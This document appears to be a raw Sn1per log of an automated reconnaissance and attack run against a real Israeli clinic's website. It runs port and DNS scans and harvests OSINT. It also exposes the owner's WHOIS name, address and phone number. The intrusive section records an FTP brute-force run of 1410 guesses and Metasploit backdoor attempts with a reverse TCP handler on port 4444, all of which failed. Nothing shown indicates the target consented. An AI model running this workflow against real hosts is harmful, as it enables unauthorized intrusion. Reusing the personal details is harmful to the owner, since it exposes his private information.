doctorarik.co.il.	21599	IN	NS	ns2.dtnt.info.


S U B N E T   C A L C U L A T I O N
====================================

Address       = 62.219.91.10
Network       = 62.219.91.10 / 32
Netmask       = 255.255.255.255
Broadcast     = not needed on Point-to-Point links
Wildcard Mask = 0.0.0.0
Hosts Bits    = 0
Max. Hosts    = 1   (2^0 - 0)
Host Range    = { 62.219.91.10 - 62.219.91.10 }


N M A P   P O R T   S C A N
============================


Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-31 04:17 UTC
Nmap scan report for doctorarik.co.il (62.219.91.10)
Host is up (0.14s latency).
rDNS record for 62.219.91.10: cust-62-219-91-10.cust.bezeqint.net
PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           Microsoft ftpd
22/tcp   filtered ssh
23/tcp   filtered telnet
25/tcp   filtered smtp
80/tcp   open     http          Microsoft IIS httpd 7.5
110/tcp  filtered pop3
143/tcp  filtered imap
443/tcp  open     ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp  filtered microsoft-ds
3389/tcp filtered ms-wbt-server
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.81 seconds


S U B - D O M A I N   F I N D E R
==================================


[i] Total Subdomains Found : 1

[+] Subdomain: mail.doctorarik.co.il
[-] IP: 62.219.91.130
[!] IP Address : 62.219.91.10
[!] Server: Microsoft-IIS/7.5
[!] Powered By: ASP.NET
[-] Clickjacking protection is not in place.
[+] Operating System : Windows
[!] www.doctorarik.co.il doesn't seem to use a CMS
[+] Honeypot Probabilty: 0%
----------------------------------------
[+] Robots.txt retrieved
User-agent: *
Disallow:

----------------------------------------
PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           Microsoft ftpd
22/tcp   filtered ssh
23/tcp   filtered telnet
25/tcp   filtered smtp
80/tcp   open     http          Microsoft IIS httpd 7.5
110/tcp  filtered pop3
143/tcp  filtered imap
443/tcp  open     ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp  filtered microsoft-ds
3389/tcp filtered ms-wbt-server
----------------------------------------

[+] DNS Records
ns2.dtnt.info. (62.219.91.150) AS8551 Bezeq International Israel
ns1.dtnt.info. (62.219.91.139) AS8551 Bezeq International Israel
ns3.dtnt.info. (52.36.225.219) AS16509 Amazon.com, Inc. United States

[+] MX Records
50 (62.219.91.130) AS8551 Bezeq International Israel

[+] MX Records
10 (62.219.91.130) AS8551 Bezeq International Israel

[+] Host Records (A)
www.doctorarik.co.ilHTTP: (cust-62-219-91-10.cust.bezeqint.net) (62.219.91.10) AS8551 Bezeq International Israel

[+] TXT Records

[+] DNS Map: https://dnsdumpster.com/static/map/www.doctorarik.co.il.png

[>] Initiating 3 intel modules
[>] Loading Alpha module (1/3)
[>] Beta module deployed (2/3)
[>] Gamma module initiated (3/3)
No emails found
No hosts found
[+] Virtual hosts:
-----------------
[>] Crawling the target for fuzzable URLs
Vulnerability Entries: 611
Last update: February 2, 2012

Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner and the database
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan


Target: http://doctorarik.co.il

Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK


## Detecting Joomla! based Firewall ...

[!] A Joomla! RS-Firewall (com_rsfirewall/com_firewall) is detected.
[!] The vulnerability probing may be logged and protected.

[!] A Joomla! J-Firewall (com_jfw) is detected.
[!] The vulnerability probing may be logged and protected.

[!] A SecureLive Joomla!(mod_securelive/com_securelive) firewall is detected.
[!] The vulnerability probing may be logged and protected.

[!] A SecureLive Joomla! firewall is detected.
[!] The vulnerability probing may be logged and protected.

[!] FWScript(from firewallscript.com) is likely to be used.
[!] The vulnerability probing may be logged and protected.

[!] A Joomla! security scanner (com_joomscan/com_joomlascan) is detected.
[!] It is likely that webmaster routinely checks insecurities.

[!] A security scanner (com_securityscanner/com_securityscan) is detected.

[!] A Joomla! jSecure Authentication is detected.
[!] You need additional secret key to access /administrator directory
[!] Default is jSecure like /administrator/?jSecure ;)

[!] A Joomla! GuardXT Security Component is detected.
[!] It is likely that webmaster routinely checks for insecurities.

[!] A Joomla! JoomSuite Defender is detected.
[!] The vulnerability probing may be logged and protected.


## Fingerprinting in progress ...

~Unable to detect the version. Is it sure a Joomla?

## Fingerprinting done.


Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes


# 379
Info -> Component: com_rss DOS Vulnerability
Versions effected: Joomla! <= 1.0.7
Check: /components/com_rss/
Exploit: /index2.php?option=com_rss&feed=test
Vulnerable? Yes
[92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +[0m
Server:		192.168.1.254
Address:	192.168.1.254#53

Non-authoritative answer:
Name:	doctorarik.co.il
Address: 62.219.91.10

doctorarik.co.il has address 62.219.91.10
doctorarik.co.il mail is handled by 10 mail.doctorarik.co.il.
doctorarik.co.il mail is handled by 50 mail.dtnt.info.
[92m + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +[0m

Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu

[+] Target is doctorarik.co.il
[+] Loading modules.
[+] Following modules are loaded:
[x] [1] ping:icmp_ping  -  ICMP echo discovery module
[x] [2] ping:tcp_ping  -  TCP-based ping discovery module
[x] [3] ping:udp_ping  -  UDP-based ping discovery module
[x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
[x] [5] infogather:portscan  -  TCP and UDP PortScanner
[x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
[x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
[x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
[x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
[x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
[x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
[x] [12] fingerprint:smb  -  SMB fingerprinting module
[x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
[+] 13 modules registered
[+] Initializing scan engine
[+] Running scan engine
[-] ping:tcp_ping module: no closed/open TCP ports known on 62.219.91.10. Module test failed
[-] ping:udp_ping module: no closed/open UDP ports known on 62.219.91.10. Module test failed
[-] No distance calculation. 62.219.91.10 appears to be dead or no ports known
[+] Host: 62.219.91.10 is down (Guess probability: 0%)
[+] Cleaning up scan engine
[+] Modules deinitialized
[+] Execution completed.
[92m + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +[0m

% The data in the WHOIS database of the .il registry is provided
% by ISOC-IL for information purposes, and to assist persons in
% obtaining information about or related to a domain name
% registration record. ISOC-IL does not guarantee its accuracy.
% By submitting a WHOIS query, you agree that you will use this
% Data only for lawful purposes and that, under no circumstances
% will you use this Data to: (1) allow, enable, or otherwise
% support the transmission of mass unsolicited, commercial
% advertising or solicitations via e-mail (spam);
% or  (2) enable high volume, automated, electronic processes that
% apply to ISOC-IL (or its systems).
% ISOC-IL reserves the right to modify these terms at any time.
% By submitting this query, you agree to abide by this policy.

query:        doctorarik.co.il

reg-name:     doctorarik
domain:       doctorarik.co.il

descr:        Arik Weisbord
descr:        A.D. Gordon 14
descr:        Herzelya
descr:        4643301
descr:        Israel
phone:        +972 54 4277997
fax-no:       +972 9 9552093
e-mail:       drarik AT netvision.net.il
admin-c:      DT-AW7749-IL
tech-c:       DT-AW7749-IL
zone-c:       DT-AW7749-IL
nserver:      ns1.dtnt.info
nserver:      ns2.dtnt.info
validity:     03-04-2018
DNSSEC:       unsigned
status:       Transfer Locked
changed:      domain-registrar AT isoc.org.il 20160403 (Assigned)

person:       Arik Weisbord
address:      Arik Weisbord
address:      A.D. Gordon 14
address:      Herzelya
address:      4643301
address:      Israel
phone:        +972 54 4277997
fax-no:       +972 9 9552093
e-mail:       drarik AT netvision.net.il
nic-hdl:      DT-AW7749-IL
changed:      domain-registrar AT isoc.org.il 20160403

registrar name: Domain The Net Technologies Ltd
registrar info: http://www.domainthenet.com

% Rights to the data above are restricted by copyright.
[92m + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +[0m

*******************************************************************
*                                                                 *
* | |_| |__   ___    /\  /\__ _ _ ____   _____  ___| |_ ___ _ __  *
* | __| '_ \ / _ \  / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | |  __/ / __  / (_| | |   \ V /  __/\__ \ ||  __/ |    *
*  \__|_| |_|\___| \/ /_/ \__,_|_|    \_/ \___||___/\__\___|_|    *
*                                                                 *
* TheHarvester Ver. 2.7                                           *
* Coded by Christian Martorella                                   *
* Edge-Security Research                                          *
* cmartorella@edge-security.com                                   *
*******************************************************************


Full harvest..
[-] Searching in Google..
	Searching 0 results...
	Searching 100 results...
	Searching 200 results...
[-] Searching in PGP Key server..
[-] Searching in Bing..
	Searching 50 results...
	Searching 100 results...
	Searching 150 results...
	Searching 200 results...
[-] Searching in Exalead..
	Searching 50 results...
	Searching 100 results...
	Searching 150 results...
	Searching 200 results...
	Searching 250 results...


[+] Emails found:
------------------
No emails found

[+] Hosts found in search engines:
------------------------------------
[-] Resolving hostnames IPs...
62.219.91.10:www.doctorarik.co.il
[+] Virtual hosts:
==================
62.219.91.10	www.metrology.co.il
62.219.91.10	www.bonbi.co.il
62.219.91.10	zantkeren.co.il
62.219.91.10	www.askal.co.il
62.219.91.10	www.joles.co.il
62.219.91.10	www.zuk-m.co.il
62.219.91.10	www.hotel-dead-sea.com
62.219.91.10	fr.informationvine.com
62.219.91.10	www.shabat-chatan.co.il
62.219.91.10	www.lahav-y.co.il
62.219.91.10	www.servadio
62.219.91.10	tami-4.com
62.219.91.10	www.chortkow.org.il
62.219.91.10	zahi.co.il
62.219.91.10	www.hotel-funday.co.il
62.219.91.10	www.m-bol.co.il
62.219.91.10	synergy-it.co.il
62.219.91.10	kdc.co.il
62.219.91.10	batyarotem.co.il
62.219.91.10	www.tbh.co.il
62.219.91.10	www.tarsis-agrichem.co.il
62.219.91.10	www.israel-tours-operator.com
62.219.91.10	www.rdpeled
62.219.91.10	4x4bike.co.il
62.219.91.10	masad.co.il
62.219.91.10	www.bedouintent.co.il
62.219.91.10	fac.co.il
62.219.91.10	zbcigar.co.il
62.219.91.10	www.romantic-funday.co.il
62.219.91.10	www.doctorarik.co.il
62.219.91.10	www.batei-malon-eilat.co.il
62.219.91.10	servadio.co.il
62.219.91.10	www.nofesh-baaretz.co.il
62.219.91.10	rshein-arc.co.il
62.219.91.10	www.rshein-arc.co.il
62.219.91.10	www.eilat-groups.co.il
62.219.91.10	www.horses.org.il
62.219.91.10	gibush.co.il
62.219.91.10	www.keshet-enoshit.co.il
62.219.91.10	www.fundays.co.il
62.219.91.10	www.gibush.co.il
62.219.91.10	www.conferences.co.il
62.219.91.10	www.yemei-gibush.co.il
62.219.91.10	www.y-huledet.co.il
62.219.91.10	habaitshelanat.co.il
62.219.91.10	www.deadsea-pinuk.co.il
62.219.91.10	www.matkot1.co.il

******************************************************
*     /\/\   ___| |_ __ _  __ _  ___   ___  / _(_) | *
*    /    \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
*   / /\/\ \  __/ || (_| | (_| | (_) | (_) |  _| | | *
*   \/    \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
*                         |___/                      *
* Metagoofil Ver 2.2                                 *
* Christian Martorella                               *
* Edge-Security.com                                  *
* cmartorella_at_edge-security.com                   *
******************************************************

[-] Starting online search...

[-] Searching for doc files, with a limit of 200
	Searching 100 results...
	Searching 200 results...
Results: 0 files found
Starting to download 50 of them:
----------------------------------------


[-] Searching for pdf files, with a limit of 200
	Searching 100 results...
	Searching 200 results...
Results: 0 files found
Starting to download 50 of them:
----------------------------------------


[-] Searching for xls files, with a limit of 200
	Searching 100 results...
	Searching 200 results...
Results: 0 files found
Starting to download 50 of them:
----------------------------------------


[-] Searching for csv files, with a limit of 200
	Searching 100 results...
	Searching 200 results...
Results: 0 files found
Starting to download 50 of them:
----------------------------------------


[-] Searching for txt files, with a limit of 200
	Searching 100 results...
	Searching 200 results...
Results: 0 files found
Starting to download 50 of them:
----------------------------------------

processing
user
email

[+] List of users found:
--------------------------

[+] List of software found:
-----------------------------

[+] List of paths and servers found:
---------------------------------------

[+] List of e-mails found:
----------------------------
[92m + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +[0m

; <<>> DiG 9.11.2-5-Debian <<>> -x doctorarik.co.il
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 1707
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;il.co.doctorarik.in-addr.arpa.	IN	PTR

;; AUTHORITY SECTION:
in-addr.arpa.		3600	IN	SOA	b.in-addr-servers.arpa. nstld.iana.org. 2017102519 1800 900 604800 3600

;; Query time: 105 msec
;; SERVER: 192.168.1.254#53(192.168.1.254)
;; WHEN: Sat Dec 30 23:17:21 EST 2017
;; MSG SIZE  rcvd: 126

dnsenum VERSION:1.2.4
[1;34m
-----   doctorarik.co.il   -----
[0m[1;31m

Host's addresses:
__________________

[0mdoctorarik.co.il.                        10686    IN    A        62.219.91.10
[1;31m

Name Servers:
______________

[0mns3.dtnt.info.                           28800    IN    A        52.36.225.219
ns2.dtnt.info.                           28799    IN    A        62.219.91.150
ns1.dtnt.info.                           28799    IN    A        62.219.91.139
[1;31m

Mail (MX) Servers:
___________________

[0mmail.doctorarik.co.il.                   10800    IN    A        62.219.91.130
mail.dtnt.info.                          28800    IN    A        62.219.91.130
[1;31m

Trying Zone Transfers and getting Bind Versions:
_________________________________________________

[0m
Trying Zone Transfer for doctorarik.co.il on ns3.dtnt.info ...

Trying Zone Transfer for doctorarik.co.il on ns2.dtnt.info ...

Trying Zone Transfer for doctorarik.co.il on ns1.dtnt.info ...

brute force file not specified, bay.
[92m + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +[0m
[91m
                 ____        _     _ _     _   _____
                / ___| _   _| |__ | (_)___| |_|___ / _ __
                \___ \| | | | '_ \| | / __| __| |_ \| '__|
                 ___) | |_| | |_) | | \__ \ |_ ___) | |
                |____/ \__,_|_.__/|_|_|___/\__|____/|_|[0m[93m

                # Coded By Ahmed Aboul-Ela - @aboul3la

[94m[-] Enumerating subdomains now for doctorarik.co.il[0m
[93m[-] verbosity is enabled, will show the subdomains results in realtime[0m
[92m[-] Searching now in Baidu..[0m
[92m[-] Searching now in Yahoo..[0m
[92m[-] Searching now in Google..[0m
[92m[-] Searching now in Bing..[0m
[92m[-] Searching now in Ask..[0m
[92m[-] Searching now in Netcraft..[0m
[92m[-] Searching now in DNSdumpster..[0m
[92m[-] Searching now in Virustotal..[0m
[92m[-] Searching now in ThreatCrowd..[0m
[92m[-] Searching now in SSL Certificates..[0m
[92m[-] Searching now in PassiveDNS..[0m
[91mYahoo: [0mwww.doctorarik.co.il
[91mVirustotal: [0mwww.doctorarik.co.il
[91mDNSdumpster: [0mmail.doctorarik.co.il
[93m[-] Saving results to file: [0m[91m/usr/share/sniper/loot/domains/domains-doctorarik.co.il.txt[0m
[93m[-] Total Unique Subdomains Found: 2[0m
[92mwww.doctorarik.co.il[0m
[92mmail.doctorarik.co.il[0m

[91m ╔═╗╦═╗╔╦╗╔═╗╦ ╦[0m
[91m ║  ╠╦╝ ║ ╚═╗╠═╣[0m
[91m ╚═╝╩╚═ ╩o╚═╝╩ ╩[0m
[91m + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +[0m
[94m
[91m [+] Domains saved to: /usr/share/sniper/loot/domains/domains-doctorarik.co.il-full.txt
[0m
[92m + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +[0m
[92m + -- ----------------------------=[Checking Email Security]=----------------- -- +[0m

[92m + -- ----------------------------=[Pinging host]=---------------------------- -- +[0m
PING doctorarik.co.il (62.219.91.10) 56(84) bytes of data.

--- doctorarik.co.il ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms


[92m + -- ----------------------------=[Running TCP port scan]=------------------- -- +[0m

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-30 23:18 EST
Warning: 62.219.91.10 giving up on port because retransmission cap hit (2).
Nmap scan report for doctorarik.co.il (62.219.91.10)
Host is up (0.43s latency).
rDNS record for 62.219.91.10: cust-62-219-91-10.cust.bezeqint.net
Not shown: 468 filtered ports, 1 closed port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
443/tcp  open  https
8443/tcp open  https-alt

Nmap done: 1 IP address (1 host up) scanned in 14.04 seconds

[92m + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +[0m
[93m + -- --=[Port 21 opened... running tests...[0m

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-30 23:18 EST
Nmap scan report for doctorarik.co.il (62.219.91.10)
Host is up (0.19s latency).
rDNS record for 62.219.91.10: cust-62-219-91-10.cust.bezeqint.net

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-brute:
|   Accounts: No valid accounts found
|_  Statistics: Performed 1410 guesses in 182 seconds, average tps: 7.4
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1|Phone|Vista (98%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (98%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8.1 R1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 13 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   283.28 ms 10.13.0.1
2   300.20 ms 37.187.24.253
3   292.21 ms 10.50.225.61
4   296.97 ms 10.17.129.40
5   287.79 ms 10.73.0.50
6   ...
7   303.72 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
8   391.49 ms 80.249.209.46
9   397.77 ms bzq-179-124-101.cust.bezeqint.net (212.179.124.101)
10  381.01 ms bzq-219-189-213.dsl.bezeqint.net (62.219.189.213)
11  180.04 ms bzq-218-77-74.red.bezeqint.net (81.218.77.74)
12  180.76 ms 62.219.24.28
13  173.76 ms cust-62-219-91-10.cust.bezeqint.net (62.219.91.10)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.62 seconds
[0m[36m     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||
[0m

       =[ [33mmetasploit v4.16.26-dev[0m                         ]
+ -- --=[ 1714 exploits - 975 auxiliary - 300 post        ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[0m[0mRHOST => doctorarik.co.il
[0mRHOSTS => doctorarik.co.il
[0m[1m[34m[*][0m doctorarik.co.il:21 - Banner: 220 Microsoft FTP Service
[1m[34m[*][0m doctorarik.co.il:21 - USER: 331 Password required for 8sP:).
[1m[34m[*][0m Exploit completed, but no session was created.
[0m[0m[1m[34m[*][0m Started reverse TCP double handler on 10.13.2.94:4444
[1m[34m[*][0m doctorarik.co.il:21 - Sending Backdoor Command
[1m[34m[*][0m Exploit completed, but no session was created.
[0m[91m + -- --=[Port 22 closed... skipping.[0m
[91m + -- --=[Port 23 closed... skipping.[0m
[91m + -- --=[Port 25 closed... skipping.[0m
[91m + -- --=[Port 53 closed... skipping.[0m
[91m + -- --=[Port 79 closed... skipping.[0m
[93m + -- --=[Port 80 opened... running tests...[0m
[92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                 ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking http://doctorarik.co.il
Generic Detection results:
The site http://doctorarik.co.il seems to be behind a WAF or some sort of security solution
Reason: Blocking is being done at connection/packet level.
Number of requests: 9

[92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
[1m[34mhttp://doctorarik.co.il[0m [301 Moved Permanently] [1m[37mCountry[0m[[37mISRAEL[0m][[1m[31mIL[0m], [1m[37mHTTPServer[0m[[1m[36mMicrosoft-IIS/7.5[0m], [1m[37mIP[0m[[37m62.219.91.10[0m], [1m[37mMicrosoft-IIS[0m[[1m[32m7.5[0m], [1m[37mRedirectLocation[0m[[37mhttp://www.doctorarik.co.il/[0m], [1m[37mTitle[0m[[1m[33mDocument Moved[0m], [1m[37mUncommonHeaders[0m[[37mx-powered-by-plesk[0m], [1m[37mX-Powered-By[0m[[37mASP.NET[0m]
[1m[34mhttp://www.doctorarik.co.il/[0m [200 OK] [1m[37mCookies[0m[[37mPHPSESSID[0m], [1m[37mCountry[0m[[37mISRAEL[0m][[1m[31mIL[0m], [1m[37mHTTPServer[0m[[1m[36mMicrosoft-IIS/7.5[0m], [1m[37mIP[0m[[37m62.219.91.10[0m], [1m[37mJQuery[0m[[1m[32m1[0m], [1m[37mMicrosoft-IIS[0m[[1m[32m7.5[0m], [1m[37mScript[0m[[37mtext/javascript[0m], [1m[37mTitle[0m[[1m[33mהרזיה, הרזיה בריאה, הרזיה נכונה- מרפאת הרזיה של ד"ר אריק ויסבורד[0m], [1m[37mUncommonHeaders[0m[[37mx-powered-by-plesk[0m], [1m[37mWordPress[0m, [1m[37mX-Powered-By[0m[[37mASP.NET[0m], [1m[37mx-pingback[0m[[37mhttp://www.doctorarik.co.il/xmlrpc.php[0m]

[94m	__  ______ _____ [0m
[94m	\ \/ / ___|_   _|[0m
[94m	 \  /\___ \ | |  [0m
[94m	 /  \ ___) || |  [0m
[94m	/_/\_|____/ |_|  [0m

[94m+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield[0m
[94m+ -- --=[Target: doctorarik.co.il:80[0m

[92m + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +[0m
[94m+ -- --=[Checking if X-Content options are enabled on doctorarik.co.il...[0m [93m

[94m+ -- --=[Checking if X-Frame options are enabled on doctorarik.co.il...[0m [93m

[94m+ -- --=[Checking if X-XSS-Protection header is enabled on doctorarik.co.il...[0m [93m

[94m+ -- --=[Checking HTTP methods on doctorarik.co.il...[0m [93m

[94m+ -- --=[Checking if TRACE method is enabled on doctorarik.co.il...[0m [93m

[94m+ -- --=[Checking for META tags on doctorarik.co.il...[0m [93m

[94m+ -- --=[Checking for open proxy on doctorarik.co.il...[0m [93m
					' <span class="separator"></span> <a class="copyright" href="http://www.parallels.com">&copy; 1999-2013. Parallels IP Holdings GmbH.<br />All rights reserved.</a>');
				}
			</script>
		</div>
	</div>

	<script>(function(){var D=document,W=window;function A(){if(W.plesk){return;}W.plesk=1;if(D.getElementsByTagName){var S=D.getElementsByTagName("head")[0].appendChild(D.createElement("script"));S.setAttribute("src","http://promo.parallels.com/js/promo.plesk.js")}}if(D.addEventListener){D.addEventListener("DOMContentLoaded",A,false)}/*@cc_on D.write("\x3cscript id=\"_IE_onload\" defer=\"defer\" src=\"javascript:void(0)\">\x3c\/script>");(D.getElementById("_IE_onload")).onreadystatechange=function(){if(this.readyState=="complete"){A()}};@*/if(/WebK/i.test(navigator.userAgent)){var C=setInterval(function(){if(/loaded|complete/.test(D.readyState)){clearInterval(C);A()}},10)}W[/*@cc_on !@*/0?'attachEvent':'addEventListener'](/*@cc_on 'on'+@*/'load',A,false)})()</script>

</body>
</html>
[94m+ -- --=[Enumerating software on doctorarik.co.il...[0m [93m
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin

[94m+ -- --=[Checking if Strict-Transport-Security is enabled on doctorarik.co.il...[0m [93m

[94m+ -- --=[Checking for Flash cross-domain policy on doctorarik.co.il...[0m [93m
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.doctorarik.co.il/crossdomain.xml">here</a></body>
[94m+ -- --=[Checking for Silverlight cross-domain policy on doctorarik.co.il...[0m [93m
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.doctorarik.co.il/clientaccesspolicy.xml">here</a></body>
[94m+ -- --=[Checking for HTML5 cross-origin resource sharing on doctorarik.co.il...[0m [93m

[94m+ -- --=[Retrieving robots.txt on doctorarik.co.il...[0m [93m
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.doctorarik.co.il/robots.txt">here</a></body>
[94m+ -- --=[Retrieving sitemap.xml on doctorarik.co.il...[0m [93m
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.doctorarik.co.il/sitemap.xml">here</a></body>
[94m+ -- --=[Checking cookie attributes on doctorarik.co.il...[0m [93m

[94m+ -- --=[Checking for ASP.NET Detailed Errors on doctorarik.co.il...[0m [93m

[0m
[92m + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +[0m
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          62.219.91.10
+ Target Hostname:    doctorarik.co.il
+ Target Port:        80
+ Start Time:         2017-12-30 23:23:35 (GMT-5)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-powered-by-plesk' found, with contents: PleskWin
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://www.doctorarik.co.il/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Scan terminated:  20 error(s) and 5 item(s) reported on remote host
+ End Time:           2017-12-30 23:31:03 (GMT-5) (448 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[92m + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +[0m
[91m[+][0m Screenshot saved to /usr/share/sniper/loot/screenshots/doctorarik.co.il-port80.jpg
[92m + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +[0m
[92m + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +[0m

[1;37m    _____ [1;37m .701F. .iBR.   .7CL. .70BR.   .7BR. .7BR'''Cq.   .70BR.      [0;31m.1BR'''Yp, .8BR'''Cq.
[1;37m   (_____)[1;37m   01     01N.    C     01       C     01   .01.    01        [1;31m  01    Yb   01   .01.
[1;37m   (() ())[1;37m   01     C YCb   C     01       C     01   ,C9     01        [0;31m  01    dP   01   ,C9
[1;37m    \   / [1;37m   01     C  .CN. C     01       C     0101dC9      01        [1;31m  01'''bg.   0101dC9
[1;37m     \ /  [1;37m   01     C   .01.C     01       C     01  YC.      01      , [0;31m  01    .Y   01  YC.
[1;37m     /=\  [1;37m   01     C     Y01     YC.     ,C     01   .Cb.    01     ,C [1;31m  01    ,9   01   .Cb.
[1;37m    [___] [1;37m .J01L. .JCL.    YC      .b0101d'.   .J01L. .J01. .J01010101C [0;31m.J0101Cd9  .J01L. .J01./ [1;37m2.1

[1;37m__[ ! ] Neither war between hackers, nor peace for the system.
[1;37m__[ ! ] [02;31mhttp://blog.inurl.com.br
[1;37m__[ ! ] [02;31mhttp://fb.com/InurlBrasil
[1;37m__[ ! ] [02;31mhttp://twitter.com/@googleinurl[0m
[1;37m__[ ! ] [02;31mhttp://github.com/googleinurl[0m
[1;37m__[ ! ] [02;31mCurrent PHP version::[ [1;37m7.0.26-1 [02;31m][0m
[1;37m__[ ! ] [02;31mCurrent script owner::[ [1;37mroot [02;31m][0m
[1;37m__[ ! ] [02;31mCurrent uname::[ [1;37mLinux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 [02;31m][0m
[1;37m__[ ! ] [02;31mCurrent pwd::[ [1;37m/usr/share/sniper [02;31m][0m
[1;37m__[ ! ] [1;33mHelp: php inurlbr.php --help[0m
[1;37m------------------------------------------------------------------------------------------------------------------------[0m

[1;37m[ ! ] Starting SCANNER INURLBR 2.1 at [30-12-2017 23:32:33][0;37m
[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
